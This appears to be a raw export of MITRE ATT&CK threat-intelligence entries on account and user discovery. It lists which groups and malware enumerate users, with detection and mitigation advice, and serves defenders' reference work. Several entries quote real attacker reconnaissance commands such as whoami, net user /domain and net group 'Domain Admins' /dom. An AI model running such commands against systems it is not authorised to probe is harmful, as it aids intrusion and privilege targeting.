[Ke3chang](https://attack.mitre.org/groups/G0004) has used implants capable of collecting the signed-in username.(Citation: Microsoft NICKEL December 2021)
Lazarus Group
Various [Lazarus Group](https://attack.mitre.org/groups/G0032) malware enumerates logged-on users.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: Novetta Blockbuster Loaders)(Citation: Novetta Blockbuster RATs)(Citation: McAfee Lazarus Resurfaces Feb 2018)(Citation: SentinelOne Lazarus macOS July 2020)(Citation: Lazarus APT January 2022)
LuminousMoth
[LuminousMoth](https://attack.mitre.org/groups/G1014) has used a malicious DLL to collect the username from compromised hosts.(Citation: Bitdefender LuminousMoth July 2021)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) malware has obtained the victim username and sent it to the C2 server.(Citation: Unit 42 Magic Hound Feb 2017)(Citation: DFIR Report APT35 ProxyShell March 2022)(Citation: DFIR Phosphorus November 2021)
MuddyWater
[MuddyWater](https://attack.mitre.org/groups/G0069) has used malware that can collect the victim’s username.(Citation: Securelist MuddyWater Oct 2018)(Citation: Trend Micro Muddy Water March 2021)
OilRig
[OilRig](https://attack.mitre.org/groups/G0049) has run &lt;code&gt;whoami&lt;/code&gt; on a victim.(Citation: Palo Alto OilRig May 2016)(Citation: Palo Alto OilRig Oct 2016)(Citation: Check Point APT34 April 2021)
Patchwork
[Patchwork](https://attack.mitre.org/groups/G0040) collected the victim username and whether it was running as admin, then sent the information to its C2 server.(Citation: Cymmetria Patchwork)(Citation: TrendMicro Patchwork Dec 2017)
Sandworm Team
[Sandworm Team](https://attack.mitre.org/groups/G0034) has collected the username from a compromised host.(Citation: US District Court Indictment GRU Unit 74455 October 2020)
Sidewinder
[Sidewinder](https://attack.mitre.org/groups/G0121) has used tools to identify the user of a compromised host.(Citation: ATT Sidewinder January 2021)
Stealth Falcon
[Stealth Falcon](https://attack.mitre.org/groups/G0038) malware gathers the registered user and primary owner name via WMI.(Citation: Citizen Lab Stealth Falcon May 2016)
Threat Group-3390
[Threat Group-3390](https://attack.mitre.org/groups/G0027) has used `whoami` to collect system user information.(Citation: Trend Micro DRBControl February 2020)
Tropic Trooper
[Tropic Trooper](https://attack.mitre.org/groups/G0081) used &lt;code&gt;letmein&lt;/code&gt; to scan for saved usernames on the target system.(Citation: TrendMicro TropicTrooper 2015)
Volt Typhoon
[Volt Typhoon](https://attack.mitre.org/groups/G1017) has executed the PowerShell command `Get-EventLog security -instanceid 4624` to identify associated user and computer account names.(Citation: Joint Cybersecurity Advisory Volt Typhoon June 2023)(Citation: Secureworks BRONZE SILHOUETTE May 2023)
Windshift
[Windshift](https://attack.mitre.org/groups/G0112) has used malware to identify the username on a compromised host.(Citation: BlackBerry Bahamut)
Wizard Spider
[Wizard Spider](https://attack.mitre.org/groups/G0102) has used "whoami" to identify the local user and their privileges.(Citation: Sophos New Ryuk Attack October 2020)
ZIRCONIUM
[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has used a tool to capture the username on a compromised host in order to register it with C2.(Citation: Zscaler APT31 Covid-19 October 2020)
Action RAT
 [Action RAT](https://attack.mitre.org/software/S1028) has the ability to collect the username from an infected host.(Citation: MalwareBytes SideCopy Dec 2021)
Agent Tesla
[Agent Tesla](https://attack.mitre.org/software/S0331) can collect the username from the victim’s machine.(Citation: DigiTrust Agent Tesla Jan 2017)(Citation: Fortinet Agent Tesla April 2018)(Citation: Malwarebytes Agent Tesla April 2020)
Agent.btz
[Agent.btz](https://attack.mitre.org/software/S0092) obtains the victim username and saves it to a file.(Citation: ThreatExpert Agent.btz)
Amadey
[Amadey](https://attack.mitre.org/software/S1025) has collected the user name from a compromised host using `GetUserNameA`.(Citation: BlackBerry Amadey 2020)
Aria-body
[Aria-body](https://attack.mitre.org/software/S0456) has the ability to identify the username on a compromised host.(Citation: CheckPoint Naikon May 2020)
AsyncRAT
[AsyncRAT](https://attack.mitre.org/software/S1087) can check if the current user of a compromised system is an administrator. (Citation: Telefonica Snip3 December 2021)
AuTo Stealer
[AuTo Stealer](https://attack.mitre.org/software/S1029) has the ability to collect the username from an infected host.(Citation: MalwareBytes SideCopy Dec 2021)
Azorult
[Azorult](https://attack.mitre.org/software/S0344) can collect the username from the victim’s machine.(Citation: Unit42 Azorult Nov 2018)
BADHATCH
[BADHATCH](https://attack.mitre.org/software/S1081) can obtain logged user information from a compromised machine and can execute the command `whoami.exe`.(Citation: BitDefender BADHATCH Mar 2021)
BISCUIT
[BISCUIT](https://attack.mitre.org/software/S0017) has a command to gather the username from the system.(Citation: Mandiant APT1 Appendix)
BLUELIGHT
[BLUELIGHT](https://attack.mitre.org/software/S0657) can collect the username on a compromised host.(Citation: Volexity InkySquid BLUELIGHT August 2021)
BabyShark
[BabyShark](https://attack.mitre.org/software/S0414) has executed the &lt;code&gt;whoami&lt;/code&gt; command.(Citation: Unit42 BabyShark Feb 2019)
Backdoor.Oldrea
[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) collects the current username from the victim.(Citation: Symantec Dragonfly)
Bazar
[Bazar](https://attack.mitre.org/software/S0534) can identify the username of the infected user.(Citation: NCC Group Team9 June 2020)
BlackCat
[BlackCat](https://attack.mitre.org/software/S1068) can utilize `net use` commands to discover the user name on a compromised host.(Citation: Microsoft BlackCat Jun 2022)
BloodHound
[BloodHound](https://attack.mitre.org/software/S0521) can collect information on user sessions.(Citation: CrowdStrike BloodHound April 2018)
Bonadan
[Bonadan](https://attack.mitre.org/software/S0486) has discovered the username of the user running the backdoor.(Citation: ESET ForSSHe December 2018)
BoomBox
[BoomBox](https://attack.mitre.org/software/S0635) can enumerate the username on a compromised host.(Citation: MSTIC Nobelium Toolset May 2021)
Bumblebee
[Bumblebee](https://attack.mitre.org/software/S1039) has the ability to identify the user name.(Citation: Google EXOTIC LILY March 2022)
Cannon
[Cannon](https://attack.mitre.org/software/S0351) can gather the username from the system.(Citation: Unit42 Cannon Nov 2018)
Cardinal RAT
[Cardinal RAT](https://attack.mitre.org/software/S0348) can collect the username from a victim machine.(Citation: PaloAlto CardinalRat Apr 2017)
Caterpillar WebShell
[Caterpillar WebShell](https://attack.mitre.org/software/S0572) can obtain a list of user accounts from a victim's machine.(Citation: ClearSky Lebanese Cedar Jan 2021)
Chaes
[Chaes](https://attack.mitre.org/software/S0631) has collected the username and UID from the infected machine.(Citation: Cybereason Chaes Nov 2020)
Chrommme
[Chrommme](https://attack.mitre.org/software/S0667) can retrieve the username from a targeted system.(Citation: ESET Gelsemium June 2021)
Clambling
[Clambling](https://attack.mitre.org/software/S0660) can identify the username on a compromised host.(Citation: Trend Micro DRBControl February 2020)(Citation: Talent-Jump Clambling February 2020)
CreepySnail
[CreepySnail](https://attack.mitre.org/software/S1024) can execute `getUsername` on compromised systems.(Citation: Microsoft POLONIUM June 2022)
Crimson
[Crimson](https://attack.mitre.org/software/S0115) can identify the user on a targeted system.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Kaspersky Transparent Tribe August 2020)(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022)
Cryptoistic
[Cryptoistic](https://attack.mitre.org/software/S0498) can gather data on the user of a compromised host.(Citation: SentinelOne Lazarus macOS July 2020)
DRATzarus
[DRATzarus](https://attack.mitre.org/software/S0694) can obtain a list of users from an infected machine.(Citation: ClearSky Lazarus Aug 2020)
DarkComet
[DarkComet](https://attack.mitre.org/software/S0334) gathers the username from the victim’s machine.(Citation: TrendMicro DarkComet Sept 2014)
DarkWatchman
[DarkWatchman](https://attack.mitre.org/software/S0673) has collected the username from a victim machine.(Citation: Prevailion DarkWatchman 2021)
Denis
[Denis](https://attack.mitre.org/software/S0354) enumerates and collects the username from the victim’s machine.(Citation: Securelist Denis April 2017)(Citation: Cybereason Cobalt Kitty 2017)
Derusbi
A Linux version of [Derusbi](https://attack.mitre.org/software/S0021) checks if the victim user ID is anything other than zero (normally used for root), and the malware will not execute if it does not have root privileges. [Derusbi](https://attack.mitre.org/software/S0021) also gathers the username of the victim.(Citation: Fidelis Turbo)
Diavol
[Diavol](https://attack.mitre.org/software/S0659) can collect the username from a compromised host.(Citation: Fortinet Diavol July 2021)
DnsSystem
[DnsSystem](https://attack.mitre.org/software/S1021) can use the Windows user name to create a unique identification for infected users and systems.(Citation: Zscaler Lyceum DnsSystem June 2022)
DownPaper
[DownPaper](https://attack.mitre.org/software/S0186) collects the victim username and sends it to the C2 server.(Citation: ClearSky Charming Kitten Dec 2017)
Dyre
[Dyre](https://attack.mitre.org/software/S0024) has the ability to identify the users on a compromised host.(Citation: Malwarebytes Dyreza November 2015)
EVILNUM
[EVILNUM](https://attack.mitre.org/software/S0568) can obtain the username from the victim's machine.(Citation: Prevailion EvilNum May 2020)
Egregor
[Egregor](https://attack.mitre.org/software/S0554) has used tools to gather information about users.(Citation: Intrinsec Egregor Nov 2020)
Emotet
[Emotet](https://attack.mitre.org/software/S0367) has enumerated all users connected to network shares.
Empire
[Empire](https://attack.mitre.org/software/S0363) can enumerate the username on targeted hosts.(Citation: Talos Frankenstein June 2019)
Epic
[Epic](https://attack.mitre.org/software/S0091) collects the user name from the victim’s machine.(Citation: Kaspersky Turla Aug 2014)
Exaramel for Linux
[Exaramel for Linux](https://attack.mitre.org/software/S0401) can run &lt;code&gt;whoami&lt;/code&gt; to identify the system owner.(Citation: ANSSI Sandworm January 2021)
Explosive
[Explosive](https://attack.mitre.org/software/S0569) has collected the username from the infected host.(Citation: CheckPoint Volatile Cedar March 2015) 
FELIXROOT
[FELIXROOT](https://attack.mitre.org/software/S0267) collects the username from the victim’s machine.(Citation: FireEye FELIXROOT July 2018)(Citation: ESET GreyEnergy Oct 2018)
Felismus
[Felismus](https://attack.mitre.org/software/S0171) collects the current username and sends it to the C2 server.(Citation: Forcepoint Felismus Mar 2017)
Flagpro
[Flagpro](https://attack.mitre.org/software/S0696) has been used to run the &lt;code&gt;whoami&lt;/code&gt; command on the system.(Citation: NTT Security Flagpro new December 2021)
FlawedAmmyy
[FlawedAmmyy](https://attack.mitre.org/software/S0381) enumerates the current user during the initial infection.(Citation: Proofpoint TA505 Mar 2018)(Citation: Korean FSI TA505 2020)
FunnyDream
[FunnyDream](https://attack.mitre.org/software/S1044) has the ability to gather user information from the targeted system using `whoami/upn&amp;whoami/fqdn&amp;whoami/logonid&amp;whoami/all`.(Citation: Bitdefender FunnyDream Campaign November 2020)
Gazer
[Gazer](https://attack.mitre.org/software/S0168) obtains the current user's security identifier.(Citation: Securelist WhiteBear Aug 2017)
Gelsemium
[Gelsemium](https://attack.mitre.org/software/S0666) has the ability to distinguish between a standard user and an administrator on a compromised host.(Citation: ESET Gelsemium June 2021)
Get2
[Get2](https://attack.mitre.org/software/S0460) has the ability to identify the current username of an infected host.(Citation: Proofpoint TA505 October 2019)
Gold Dragon
[Gold Dragon](https://attack.mitre.org/software/S0249) collects the endpoint victim's username and uses it as a basis for downloading additional components from the C2 server.(Citation: McAfee Gold Dragon)
Goopy
[Goopy](https://attack.mitre.org/software/S0477) has the ability to enumerate the infected system's user name.(Citation: Cybereason Cobalt Kitty 2017)
Grandoreiro
[Grandoreiro](https://attack.mitre.org/software/S0531) can collect the username from the victim's machine.(Citation: ESET Grandoreiro April 2020)
GravityRAT
[GravityRAT](https://attack.mitre.org/software/S0237) collects the victim username along with other account information (account type, description, full name, SID and status).(Citation: Talos GravityRAT)
GrimAgent
[GrimAgent](https://attack.mitre.org/software/S0632) can identify the user id on a target machine.(Citation: Group IB GrimAgent July 2021)
HAPPYWORK
can collect the victim user name.(Citation: FireEye APT37 Feb 2018)
HAWKBALL
[HAWKBALL](https://attack.mitre.org/software/S0391) can collect the user name of the system.(Citation: FireEye HAWKBALL Jun 2019)
HotCroissant
[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to collect the username on the infected host.(Citation: Carbon Black HotCroissant April 2020)
InvisiMole
[InvisiMole](https://attack.mitre.org/software/S0260) lists local users and session information.(Citation: ESET InvisiMole June 2018)
Ixeshe
[Ixeshe](https://attack.mitre.org/software/S0015) collects the username from the victim’s machine.(Citation: Trend Micro IXESHE 2012)
JPIN
[JPIN](https://attack.mitre.org/software/S0201) can obtain the victim user name.(Citation: Microsoft PLATINUM April 2016)
KONNI
[KONNI](https://attack.mitre.org/software/S0356) can collect the username from the victim’s machine.(Citation: Talos Konni May 2017)
KOPILUWAK
[KOPILUWAK](https://attack.mitre.org/software/S1075) can conduct basic network reconnaissance on the victim machine with `whoami`, to get user details.(Citation: Mandiant Suspected Turla Campaign February 2023)
Kazuar
[Kazuar](https://attack.mitre.org/software/S0265) gathers information on users.(Citation: Unit 42 Kazuar May 2017)
Koadic
[Koadic](https://attack.mitre.org/software/S0250) can identify logged in users across the domain and views user sessions.(Citation: Github Koadic)(Citation: MalwareBytes LazyScripter Feb 2021)
Komplex
The OsInfo function in [Komplex](https://attack.mitre.org/software/S0162) collects the current running username.(Citation: Sofacy Komplex Trojan)
Kwampirs
[Kwampirs](https://attack.mitre.org/software/S0236) collects registered owner details by using the commands &lt;code&gt;systeminfo&lt;/code&gt; and &lt;code&gt;net config workstation&lt;/code&gt;.(Citation: Symantec Orangeworm April 2018)
Linux Rabbit
[Linux Rabbit](https://attack.mitre.org/software/S0362) opens a socket on port 22 and if it receives a response it attempts to obtain the machine's hostname and Top-Level Domain. (Citation: Anomali Linux Rabbit 2018)
LiteDuke
[LiteDuke](https://attack.mitre.org/software/S0513) can enumerate the account name on a targeted system.(Citation: ESET Dukes October 2019)
LitePower
[LitePower](https://attack.mitre.org/software/S0680) can determine if the current user has admin privileges.(Citation: Kaspersky WIRTE November 2021)
Lizar
[Lizar](https://attack.mitre.org/software/S0681) can collect the username from the system.(Citation: BiZone Lizar May 2021) 
Lokibot
[Lokibot](https://attack.mitre.org/software/S0447) has the ability to discover the username on the infected host.(Citation: FSecure Lokibot November 2019)
Lucifer
[Lucifer](https://attack.mitre.org/software/S0532) has the ability to identify the username on a compromised host.(Citation: Unit 42 Lucifer June 2020)
MacMa
[MacMa](https://attack.mitre.org/software/S1016) can collect the username from the compromised machine.(Citation: ESET DazzleSpy Jan 2022)
Mafalda
[Mafalda](https://attack.mitre.org/software/S1060) can collect the username from a compromised host.(Citation: SentinelLabs Metador Technical Appendix Sept 2022)
MarkiRAT
[MarkiRAT](https://attack.mitre.org/software/S0652) can retrieve the victim’s username.(Citation: Kaspersky Ferocious Kitten Jun 2021)
MechaFlounder
[MechaFlounder](https://attack.mitre.org/software/S0459) has the ability to identify the username and hostname on a compromised host.(Citation: Unit 42 MechaFlounder March 2019)
Metamorfo
[Metamorfo](https://attack.mitre.org/software/S0455) has collected the username from the victim's machine.(Citation: ESET Casbaneiro Oct 2019) 
Micropsia
[Micropsia](https://attack.mitre.org/software/S0339) collects the username from the victim’s machine.(Citation: Talos Micropsia June 2017)
Milan
[Milan](https://attack.mitre.org/software/S1015) can identify users registered to a targeted machine.(Citation: ClearSky Siamesekitten August 2021)
MirageFox
[MirageFox](https://attack.mitre.org/software/S0280) can gather the username from the victim’s machine.(Citation: APT15 Intezer June 2018)
Mis-Type
[Mis-Type](https://attack.mitre.org/software/S0084) runs tests to determine the privilege level of the compromised user.(Citation: Cylance Dust Storm)
MoonWind
[MoonWind](https://attack.mitre.org/software/S0149) obtains the victim username.(Citation: Palo Alto MoonWind March 2017)
More_eggs
[More_eggs](https://attack.mitre.org/software/S0284) has the capability to gather the username from the victim's machine.(Citation: Talos Cobalt Group July 2018)(Citation: Security Intelligence More Eggs Aug 2019)
Mosquito
[Mosquito](https://attack.mitre.org/software/S0256) runs &lt;code&gt;whoami&lt;/code&gt; on the victim’s machine.(Citation: ESET Turla Mosquito Jan 2018)
NBTscan
[NBTscan](https://attack.mitre.org/software/S0590) can list active users on the system.(Citation: Debian nbtscan Nov 2019)(Citation: SecTools nbtscan June 2003)	
NDiskMonitor
[NDiskMonitor](https://attack.mitre.org/software/S0272) obtains the victim username and encrypts the information to send over its C2 channel.(Citation: TrendMicro Patchwork Dec 2017)
NOKKI
[NOKKI](https://attack.mitre.org/software/S0353) can collect the username from the victim’s machine.(Citation: Unit 42 NOKKI Sept 2018)
NanHaiShu
[NanHaiShu](https://attack.mitre.org/software/S0228) collects the username from the victim.(Citation: fsecure NanHaiShu July 2016)
Neoichor
[Neoichor](https://attack.mitre.org/software/S0691) can collect the user name from a victim's machine.(Citation: Microsoft NICKEL December 2021)
ObliqueRAT
[ObliqueRAT](https://attack.mitre.org/software/S0644) can check for blocklisted usernames on infected endpoints.(Citation: Talos Oblique RAT March 2021)
Octopus
[Octopus](https://attack.mitre.org/software/S0340) can collect the username from the victim’s machine.(Citation: Securelist Octopus Oct 2018)
Okrum
[Okrum](https://attack.mitre.org/software/S0439) can collect the victim username.(Citation: ESET Okrum July 2019)
POWERSTATS
[POWERSTATS](https://attack.mitre.org/software/S0223) has the ability to identify the username on the compromised host.(Citation: TrendMicro POWERSTATS V3 June 2019)
POWRUNER
[POWRUNER](https://attack.mitre.org/software/S0184) may collect information about the currently logged in user by running &lt;code&gt;whoami&lt;/code&gt; on a victim.(Citation: FireEye APT34 Dec 2017)
PoetRAT
[PoetRAT](https://attack.mitre.org/software/S0428) sent username, computer name, and the previously generated UUID in reply to a "who" command from C2.(Citation: Talos PoetRAT April 2020)
PowerDuke
[PowerDuke](https://attack.mitre.org/software/S0139) has commands to get the current user's name and SID.(Citation: Volexity PowerDuke November 2016)
PowerShower
[PowerShower](https://attack.mitre.org/software/S0441) has the ability to identify the current user on the infected host.(Citation: Kaspersky Cloud Atlas August 2019)
Prikormka
A module in [Prikormka](https://attack.mitre.org/software/S0113) collects information from the victim about the current user name.(Citation: ESET Operation Groundbait)
Pupy
[Pupy](https://attack.mitre.org/software/S0192) can enumerate local information for Linux hosts and find currently logged on users for Windows hosts.(Citation: GitHub Pupy)
PyDCrypt
[PyDCrypt](https://attack.mitre.org/software/S1032) has probed victim machines with &lt;code&gt;whoami&lt;/code&gt; and has collected the username from the machine.(Citation: Checkpoint MosesStaff Nov 2021)
QUADAGENT
[QUADAGENT](https://attack.mitre.org/software/S0269) gathers the victim username.(Citation: Unit 42 QUADAGENT July 2018)
QakBot
[QakBot](https://attack.mitre.org/software/S0650) can identify the user name on a compromised system.(Citation: Kaspersky QakBot September 2021)(Citation: Trend Micro Black Basta October 2022)
QuasarRAT
[QuasarRAT](https://attack.mitre.org/software/S0262) can enumerate the username and account type.(Citation: CISA AR18-352A Quasar RAT December 2018)
RATANKBA
[RATANKBA](https://attack.mitre.org/software/S0241) runs the &lt;code&gt;whoami&lt;/code&gt; and &lt;code&gt;query user&lt;/code&gt; commands.(Citation: RATANKBA)
RCSession
[RCSession](https://attack.mitre.org/software/S0662) can gather system owner information, including user and administrator privileges.(Citation: Profero APT27 December 2020)
RGDoor
[RGDoor](https://attack.mitre.org/software/S0258) executes the &lt;code&gt;whoami&lt;/code&gt; on the victim’s machine.(Citation: Unit 42 RGDoor Jan 2018)
ROKRAT
[ROKRAT](https://attack.mitre.org/software/S0240) can collect the username from a compromised host.(Citation: Malwarebytes RokRAT VBA January 2021)
RTM
[RTM](https://attack.mitre.org/software/S0148) can obtain the victim username and permissions.(Citation: ESET RTM Feb 2017)
Reaver
[Reaver](https://attack.mitre.org/software/S0172) collects the victim's username.(Citation: Palo Alto Reaver Nov 2017)
RedLeaves
[RedLeaves](https://attack.mitre.org/software/S0153) can obtain information about the logged on user both locally and for Remote Desktop sessions.(Citation: PWC Cloud Hopper Technical Annex April 2017)
Remsec
[Remsec](https://attack.mitre.org/software/S0125) can obtain information about the current user.(Citation: Kaspersky ProjectSauron Technical Analysis)
Revenge RAT
[Revenge RAT</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor logs and other sources of command execution history for actions that could be taken to gather information about accounts, including the use of calls to cloud APIs that perform account discovery.
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment, and also to an extent in normal network operations. Therefore discovery data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
File Access
Monitor access to file resources that contain local accounts and groups information such as &lt;code&gt;/etc/passwd&lt;/code&gt;, &lt;code&gt;/Users&lt;/code&gt; directories, and the SAM database. 
If access requires high privileges, look for non-admin objects (such as users or processes) attempting to access restricted file resources.
Process Creation
Monitor for processes that can be used to enumerate user accounts and groups such as &lt;code&gt;net.exe&lt;/code&gt; and &lt;code&gt;net1.exe&lt;/code&gt;, especially when executed in quick succession.(Citation: Elastic - Koadiac Detection with EQL)
Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
Operating System Configuration
Prevent administrator accounts from being enumerated when an application is elevating through UAC since it can lead to the disclosure of account names. The Registry key is located &lt;code&gt;HKLM\ SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\CredUI\EnumerateAdministrators&lt;/code&gt;. It can be disabled through GPO: Computer Configuration &gt; [Policies] &gt; Administrative Templates &gt; Windows Components &gt; Credential User Interface: E numerate administrator accounts on elevation. (Citation: UCF STIG Elevation Account Enumeration)
SolarWinds Compromise
During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) obtained a list of users and their roles from an Exchange server using `Get-ManagementRoleAssignment`.(Citation: Volexity SolarWinds)
FIN13
[FIN13](https://attack.mitre.org/groups/G1016) has enumerated all users and their roles from a victim's main treasury system.(Citation: Mandiant FIN13 Aug 2022)
ShimRatReporter
[ShimRatReporter](https://attack.mitre.org/software/S0445) listed all non-privileged and privileged accounts available on the machine.(Citation: FOX-IT May 2016 Mofang)
Woody RAT
[Woody RAT](https://attack.mitre.org/software/S1065) can identify administrator accounts on an infected machine.(Citation: MalwareBytes WoodyRAT Aug 2022)
XCSSET
[XCSSET](https://attack.mitre.org/software/S0658) attempts to discover accounts from various locations such as a user's Evernote, AppleID, Telegram, Skype, and WeChat data.(Citation: trendmicro xcsset xcode project 2020)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor logs for actions that could be taken to gather information about cloud accounts, including the use of calls to cloud APIs that perform account discovery.
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment, and also to an extent in normal network operations. Therefore discovery data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
Audit
Routinely check user permissions to ensure only the expected users have the ability to list IAM identities or otherwise discover cloud accounts.
User Account Management
Limit permissions to discover cloud accounts in accordance with least privilege. Organizations should limit the number of users within the organization with an IAM role that has administrative privileges, strive to reduce all permanent privileged role assignments, and conduct periodic entitlement reviews on IAM users, roles and policies.
C0027
During [C0027](https://attack.mitre.org/campaigns/C0027), [Scattered Spider](https://attack.mitre.org/groups/G1015) accessed Azure AD to download bulk lists of group members and to identify privileged users, along with the email addresses and AD attributes.(Citation: Crowdstrike TELCO BPO Campaign December 2022)
APT29
[APT29](https://attack.mitre.org/groups/G0016) has conducted enumeration of Azure AD accounts.(Citation: MSTIC Nobelium Oct 2021)
AADInternals
[AADInternals](https://attack.mitre.org/software/S0677) can enumerate Azure AD users.(Citation: AADInternals Documentation)
Pacu
[Pacu](https://attack.mitre.org/software/S1091) can enumerate IAM users, roles, and groups. (Citation: GitHub Pacu)
ROADTools
[ROADTools](https://attack.mitre.org/software/S0684) can enumerate Azure AD users.(Citation: Roadtools)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor for execution of commands and arguments associated with enumeration or information gathering of domain accounts and groups, such as &lt;code&gt;net user /domain&lt;/code&gt; and &lt;code&gt;net group /domain&lt;/code&gt;, &lt;code&gt;dscacheutil -q group&lt;/code&gt;on macOS, and &lt;code&gt;ldapsearch&lt;/code&gt; on Linux.
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment, and also to an extent in normal network operations. Therefore discovery data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
Group Enumeration
Monitor for logging that may suggest a list of available groups and/or their associated settings has been extracted, ex. Windows EID 4798 and 4799.
Network Traffic Content
Monitor and analyze traffic patterns and packet inspection associated to LDAP and MSRPC that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure).
OS API Execution
Monitor for API calls that may attempt to gather information about domain accounts such as type of user, privileges and groups.
Process Creation
Monitor for processes that can be used to enumerate domain accounts and groups, such as &lt;code&gt;net.exe&lt;/code&gt; and &lt;code&gt;net1.exe&lt;/code&gt;, especially when executed in quick succession.(Citation: Elastic - Koadiac Detection with EQL)
Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.
Operating System Configuration
Prevent administrator accounts from being enumerated when an application is elevating through UAC since it can lead to the disclosure of account names. The Registry key is located at &lt;code&gt;HKLM\ SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\CredUI\EnumerateAdministrators&lt;/code&gt;. It can be disabled through GPO: Computer Configuration &gt; [Policies] &gt; Administrative Templates &gt; Windows Components &gt; Credential User Interface: Enumerate administrator accounts on elevation.(Citation: UCF STIG Elevation Account Enumeration)
Operation CuckooBees
During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors used the `dsquery` and `dsget` commands to get domain environment information and to query users in administrative groups.(Citation: Cybereason OperationCuckooBees May 2022)
Operation Dream Job
During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) queried compromised victim's active directory servers to obtain the list of employees including administrator accounts.(Citation: ESET Lazarus Jun 2020)
Operation Wocao
During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used the `net` command to retrieve information about domain accounts.(Citation: FoxIT Wocao December 2019) 
SolarWinds Compromise
During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) used PowerShell to discover domain accounts by exectuing `Get-ADUser` and `Get-ADGroupMember`.(Citation: CrowdStrike StellarParticle January 2022)(Citation: Secureworks IRON RITUAL Profile)
BRONZE BUTLER
[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used &lt;code&gt;net user /domain&lt;/code&gt; to identify account information.(Citation: Secureworks BRONZE BUTLER Oct 2017)
Chimera
[Chimera](https://attack.mitre.org/groups/G0114) has has used &lt;code&gt;net user /dom&lt;/code&gt; and &lt;code&gt;net user Administrator&lt;/code&gt; to enumerate domain accounts including administrator accounts.(Citation: Cycraft Chimera April 2020)(Citation: NCC Group Chimera January 2021)
Dragonfly
[Dragonfly](https://attack.mitre.org/groups/G0035) has used batch scripts to enumerate users on a victim domain controller.(Citation: US-CERT TA18-074A)
FIN13
[FIN13](https://attack.mitre.org/groups/G1016) can identify user accounts associated with a Service Principal Name and query Service Principal Names within the domain by utilizing the following scripts: `GetUserSPNs.vbs` and `querySpn.vbs`.(Citation: Mandiant FIN13 Aug 2022)(Citation: Sygnia Elephant Beetle Jan 2022)
FIN6
[FIN6](https://attack.mitre.org/groups/G0037) has used Metasploit’s [PsExec](https://attack.mitre.org/software/S0029) NTDSGRAB module to obtain a copy of the victim's Active Directory database.(Citation: FireEye FIN6 April 2016)
Fox Kitten
[Fox Kitten](https://attack.mitre.org/groups/G0117) has used the Softerra LDAP browser to browse documentation on service accounts.(Citation: CISA AA20-259A Iran-Based Actor September 2020)
Ke3chang
[Ke3chang](https://attack.mitre.org/groups/G0004) performs account discovery using commands such as &lt;code&gt;net localgroup administrators&lt;/code&gt; and &lt;code&gt;net group "REDACTED" /domain&lt;/code&gt; on specific permissions groups.(Citation: Mandiant Operation Ke3chang November 2014)
LAPSUS$
[LAPSUS$](https://attack.mitre.org/groups/G1004) has used the AD Explorer tool to enumerate users on a victim's network.(Citation: MSTIC DEV-0537 Mar 2022)(Citation: NCC Group LAPSUS Apr 2022)
MuddyWater
[MuddyWater](https://attack.mitre.org/groups/G0069) has used &lt;code&gt;cmd.exe net user /domain&lt;/code&gt; to enumerate domain users.(Citation: Trend Micro Muddy Water March 2021)
OilRig
[OilRig](https://attack.mitre.org/groups/G0049) has run &lt;code&gt;net user&lt;/code&gt;, &lt;code&gt;net user /domain&lt;/code&gt;, &lt;code&gt;net group “domain admins” /domain&lt;/code&gt;, and &lt;code&gt;net group “Exchange Trusted Subsystem” /domain&lt;/code&gt; to get account listings on a victim.(Citation: Palo Alto OilRig May 2016)
Poseidon Group
[Poseidon Group](https://attack.mitre.org/groups/G0033) searches for administrator accounts on both the local victim machine and the network.(Citation: Kaspersky Poseidon Group)
Sandworm Team
[Sandworm Team](https://attack.mitre.org/groups/G0034) has used a tool to query Active Directory using LDAP, discovering information about usernames listed in AD.(Citation: ESET Telebots Dec 2016)	
Turla
[Turla](https://attack.mitre.org/groups/G0010) has used &lt;code&gt;net user /domain&lt;/code&gt; to enumerate domain accounts.(Citation: ESET ComRAT May 2020)
Volt Typhoon
[Volt Typhoon](https://attack.mitre.org/groups/G1017) has run `net group /dom` and `net group "Domain Admins" /dom` in compromised environments for account discovery.(Citation: Joint Cybersecurity Advisory Volt Typhoon June 2023)(Citation: Secureworks BRONZE SILHOUETTE May 2023)
Wizard Spider
[Wizard Spider](https://attack.mitre.org/groups/G0102) has identified domain admins through the use of `net group "Domain admins" /DOMAIN`. [Wizard Spider](https://attack.mitre.org/groups/G0102) has also leveraged the PowerShell cmdlet `Get-ADComputer` to collect account names from Active Directory data.(Citation: DFIR Ryuk's Return October 2020)(Citation: Mandiant FIN12 Oct 2021)
menuPass
[menuPass](https://attack.mitre.org/groups/G0045) has used the Microsoft administration tool csvde.exe to export Active Directory data.(Citation: PWC Cloud Hopper Technical Annex April 2017)
AdFind
